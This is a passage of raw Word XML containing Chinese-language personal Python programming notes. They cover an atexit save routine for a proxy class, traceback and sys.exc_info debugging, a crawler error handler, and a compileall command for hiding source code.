        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E464B7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_del</w:t>
      </w:r>
      <w:r w:rsidRPr="00E464B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E464B7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E464B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>一样的函数，还没有</w:t>
      </w:r>
      <w:r w:rsidRPr="00E464B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r w:rsidRPr="00E464B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>报错。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8CE6A7" w14:textId="77777777" w:rsidR="00D83806" w:rsidRDefault="00D83806" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="595831E5" w14:textId="77777777" w:rsidR="00E464B7" w:rsidRDefault="00E464B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class GetIPProxy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277F08D1" w14:textId="77777777" w:rsidR="00E464B7" w:rsidRDefault="00E464B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    def __init__(self, proxies: dict):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CE05C2" w14:textId="4F81FF9C" w:rsidR="00E2040A" w:rsidRDefault="00E464B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E464B7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>atexit.register(self.exit_func)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18215EA0" w14:textId="77777777" w:rsidR="00E464B7" w:rsidRDefault="00E464B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E464B7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>def exit_func(self,):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5337E0A3" w14:textId="77777777" w:rsidR="00E464B7" w:rsidRDefault="00E464B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将删除错误节点后的节点列表保存到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cityList.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B1B61E" w14:textId="77777777" w:rsidR="00E464B7" w:rsidRDefault="00E464B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法在析构函数中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字，所以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>atexit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来构造本析构函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A45BC4" w14:textId="77777777" w:rsidR="00E464B7" w:rsidRDefault="00E464B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        with open("cityList.json", "w", encoding='utf-8') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716130E3" w14:textId="77777777" w:rsidR="00E464B7" w:rsidRDefault="00E464B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            updatedAreaNodes = {"result": self.cityList.items}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389D67A1" w14:textId="77777777" w:rsidR="00E464B7" w:rsidRDefault="00E464B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            json.dump(updatedAreaNodes, f, ensure_ascii=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3409DEAD" w14:textId="099D6C60" w:rsidR="004C452C" w:rsidRDefault="00E464B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            f.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B06EC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0096E9FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="446" w:name="_Toc159779890"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常调试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="446"/>
    </w:p>
    <w:p w14:paraId="389B6827" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:bookmarkStart w:id="447" w:name="OLE_LINK7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://blog.csdn.net/weixin_42420422/article/details/114406623" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/weixin_42420422/article/details/114406623</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="447"/>
    </w:p>
    <w:p w14:paraId="3CF76075" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="793C47F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>import traceback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A191F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0968A1D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E15A667" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9D631B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>traceback.print_exc()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EFEAAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>如果想要获取异常完整信息而不打断程序，最好使用</w:t>
      </w:r>
      <w:r>
        <w:t>sys.exc_info()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260A25F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5E7281" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385BA48B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>except Exception,e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC42EB5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print(sys.exc_info())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374090CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42FFC10B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689DA227" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">except Exception: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0262A63C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>sys.exc_info()[0:2]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>打印错误类型，错误值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D900D23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>traceback.extract_tb(sys.exc_info()[2])</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t>出错位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A54BA2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F77459C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>注：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB655C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>traceback.print_exc()</w:t>
      </w:r>
      <w:r>
        <w:t>跟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>traceback.format_exc()</w:t>
      </w:r>
      <w:r>
        <w:t>有什么区别呢？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5705808B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>format_exc()</w:t>
      </w:r>
      <w:r>
        <w:t>返回字符串，</w:t>
      </w:r>
      <w:r>
        <w:t>print_exc()</w:t>
      </w:r>
      <w:r>
        <w:t>则直接给打印出来。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092138D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>即</w:t>
      </w:r>
      <w:r>
        <w:t>traceback.print_exc()</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>print traceback.format_exc()</w:t>
      </w:r>
      <w:r>
        <w:t>效果是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8DD8CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>print_exc()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>还可以接受</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>参数直接写入到一个文件。比如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC35518" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>traceback.print_exc(file=open('tb.txt','w+'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A42FAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>写入到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>tb.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>文件去。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C58492" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B7B999A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FC06423" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爬虫代码参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CE7F96" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        except Exception as err:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0701747D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            print("=" * 20 + " ERROR " + "=" * 20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDE8E77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            print(sys.exc_info())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0C47C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            print("=" * 20 + " ERROR " + "=" * 20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782A108D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            log_data.error("</w:t>
      </w:r>
      <w:r>
        <w:t>节点去世：</w:t>
      </w:r>
      <w:r>
        <w:t>try self.parse</w:t>
      </w:r>
      <w:r>
        <w:t>匹配失败存在异常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> " + self.path + str(err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C9F613" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF1EC53" w14:textId="6B2C97BD" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C61D15" w14:textId="53566600" w:rsidR="00B243F9" w:rsidRDefault="00B243F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EB3E115" w14:textId="6DB924D9" w:rsidR="00CB6748" w:rsidRDefault="00CB6748" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="448" w:name="_Toc159779891"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反编译，放置源码泄露</w:t>
      </w:r>
      <w:bookmarkEnd w:id="448"/>
    </w:p>
    <w:p w14:paraId="009DE447" w14:textId="77777777" w:rsidR="00CB6748" w:rsidRDefault="00CB6748" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1476F458" w14:textId="2CDBE510" w:rsidR="00CB6748" w:rsidRDefault="00CB6748" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个参考链接，未考证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8DCAAC" w14:textId="2355A219" w:rsidR="00CB6748" w:rsidRDefault="00CB6748" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CB6748">
        <w:t>https://blog.csdn.net/muyao987/article/details/126488384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F244337" w14:textId="77777777" w:rsidR="00CB6748" w:rsidRDefault="00CB6748" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35132F4C" w14:textId="77777777" w:rsidR="00CB6748" w:rsidRDefault="00CB6748" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EBDCB7D" w14:textId="77777777" w:rsidR="00CB6748" w:rsidRDefault="00CB6748" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F450D4" w14:textId="064BCFC3" w:rsidR="002D14D3" w:rsidRDefault="002D14D3" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="449" w:name="_Toc159779892"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>compileall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译：防止泄露源码</w:t>
      </w:r>
      <w:r w:rsidR="00CB6748">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00CB6748">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前看来无法使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="449"/>
    </w:p>
    <w:p w14:paraId="4B878C0A" w14:textId="77777777" w:rsidR="002D14D3" w:rsidRDefault="002D14D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="200AEB27" w14:textId="70C054E2" w:rsidR="002025C7" w:rsidRPr="002025C7" w:rsidRDefault="002025C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002025C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="002025C7">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidR="00D12CEE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -O</w:t>
      </w:r>
      <w:r w:rsidRPr="002025C7">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m compileall -d /path/to/output/directory /path/to/your/project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4141AED5" w14:textId="77777777" w:rsidR="002025C7" w:rsidRDefault="002025C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B720930" w14:textId="77777777" w:rsidR="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>* `python`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：这是运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释器的命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D765A2" w14:textId="77777777" w:rsidR="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>* `-m`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：此选项允许你运行一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块作为主程序。在这种情况下，要运行的模块是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`compileall`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2262C09C" w14:textId="77777777" w:rsidR="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>* `compileall`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
